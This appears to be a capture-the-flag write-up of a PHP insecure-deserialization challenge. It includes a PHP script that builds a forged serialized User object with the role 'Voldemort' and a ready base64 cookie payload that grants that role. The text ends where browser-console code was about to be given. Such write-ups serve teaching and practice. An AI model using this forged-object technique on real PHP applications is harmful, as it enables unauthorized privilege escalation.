As we can see it looks like that it's a normal page nothing strange in it let's check the source code
I found that there is a link to "source.php" let's check it
As we can see it has php code with some html let's check what can we do with it
There is a class called user that has a private variable called "role" and it has value of "Guest", and there is a "GetInfo" method that checks if you have "Voldemort" role or not and return something according to that
Then we have another piece of php code checking if user have "user" cookie and if it exists it decode it and then unserializing it. and if "user" cookie not exists it create a user with the default role (Guest)
Now we can take the user class, edit the role to "Voldemort" then serializing and then encoding it let's try to do that with the following code
<?php
class User
{
private $role = "Voldemort";
public function GetInfo()
{
include("titles.php");
if($this->role === "Voldemort")
{
return $Title_A;
}
else
{
return $Title_B;
}
}
}
$user = new User();
$solution = base64_encode(serialize($user));
echo $solution;There is two ways to exploit it
You can add new cookie named "user" and asign "Tzo0OiJVc2VyIjoxOntzOjEwOiIAVXNlcgByb2xlIjtzOjk6IlZvbGRlbW9ydCI7fQ==" to it's value.
You can easily execute the following code in the browser console
